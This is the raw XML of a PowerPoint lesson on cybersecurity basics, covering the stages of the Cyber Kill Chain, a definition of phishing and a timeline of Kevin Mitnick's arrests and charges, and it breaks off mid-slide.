              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>China DDoS Telegram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Australian Signals Directorate Attacks ISIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Russia DNC Hack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Phishing Scams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48637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Cyber Kill Chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4093428"/>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Kill Chain</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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 military concept relating to the structure of an attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cyber Kill Chain</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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Developed by Lockheed Martin, the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Cyber Kill Chain®</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> framework is part of the model for identification and prevention of cyber intrusions activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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Identifies what the adversaries must complete in order to achieve their objective.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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Comprised of 7 primary steps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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6526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B19641-2986-D543-AD8D-2F9AAB6F3E44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2167128" y="705440"/>
            <a:ext cx="5215577" cy="6079407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0220E3DB-5F68-FC44-B160-79397A07D850}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7936992" y="5361785"/>
            <a:ext cx="3560064" cy="967534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34877343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Cyber Kill Chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5262979"/>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Reconnaissance</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Harvesting email addresses, network/business information, etc.</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Identification of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="ct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fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Weaponization</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Creates a virus or worm, tailored to one or more vulnerabilities</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Exploit + backdoor = deliverable payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Delivery</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Delivering the weaponized bundle via email, web, USB, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ct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Exploitation</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Malware code triggers, exploiting a vulnerability to execute code on a victim system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297588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Cyber Kill Chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4893647"/>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Installation</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Installing malware on the victim system enabling a backdoor for the intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Command and Control (C2)</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Create a command channel for persistent remote manipulation of the victim system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Actions on Objectives</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With “hands on keyboard” access, intruders accomplish their original goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Data exfiltration/destruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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Encryption for ransom</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167303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Kevin Mitnick – The World’s Most Famous Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4401205"/>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1981</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As a teenager, he was convicted of burgling computer manuals from Pacific Bell and sentenced to probation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1983</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He served six months in jail for breaking into computers at the University of Southern California.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1987</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He was arrested for hacking into the computers of a Santa Cruz software publisher and sentenced at that time to three years probation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1988</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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He arrested for illegally copying software from Digital Equipment Corporation. During that trial, his defense attorneys argued that his hacking activities were an "addiction" and he was sentenced to a year in jail and six months in a halfway house.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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77391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Kevin Mitnick – The World’s Most Famous Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3170099"/>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1992</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Authorities planned to arrest Mitnick for hacking into Pacific Bell computers and for violating the terms of his parole by associating with Lewis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DePayne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, a longtime friend and also a convicted hacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"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Alerted to the impending arrest, Mitnick disappeared. His hacking, however, continued.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ctr">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After he attacked the computers of California computer security expert Tsutomu Shimomura, Shimomura assisted the FBI in tracking Mitnick to North Carolina.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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8092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Vocabulary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Form of social engineering whereby the victim (or target) unwittingly performs an act giving access to a third party</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392363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Kevin Mitnick – The World’s Most Famous Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1995</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Mitnick and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DePayne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are taken into custody</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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The federal government had compiled a substantial indictment against them:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2"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25 counts of computer crimes including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3"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possession of unauthorized access devices,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3"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computer fraud,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3"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causing damage to computers,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3"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wire fraud,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and interception of wire or electronic communications.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113176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Kevin Mitnick – The World’s Most Famous Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4154984"/>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The indictment accused the pair of fraudulently obtaining unauthorized access to computers belonging to software and operating systems manufacturers, cellular telephone manufacturers, internet service providers, and educational institutions.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They allegedly used the information to steal and copy proprietary computer software from Motorola, Nokia, Fujitsu, Novell, NEC, and Sun Microsystems.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Mitnick and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DePayne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> were also charged with fraudulent acquisition and possession of hundreds of confidential computer passwords.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334519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Kevin Mitnick – The World’s Most Famous Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the FBI arrested him on February 15, 1995, in a Raleigh, North Carolina, apartment, Kevin Mitnick was either a master of victimless computer trespassing or a dangerous vandal whose intrusions into commercial computer sites had cost international companies millions of dollars.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The argument over whether Mitnick was a felon or a mere nuisance would outlast his confrontation with the justice system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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75295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Kevin Mitnick – The World’s Most Famous Hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Crimes Charged</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Wire fraud (14 counts)</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Possession of unauthorized access devices (8 counts)</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Interception of wire or electronic communications</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Unauthorized access to a federal computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" fontAlgn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Causing damage to a computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chief Defense Lawyers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Donald Randolph and Gregory Vincent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chief Prosecutors: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Christopher Painter and David Schindler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Judge: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Marianna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pfaelzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Place: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Los Angeles, California</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Date of Sentencing after Plea Agreement: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
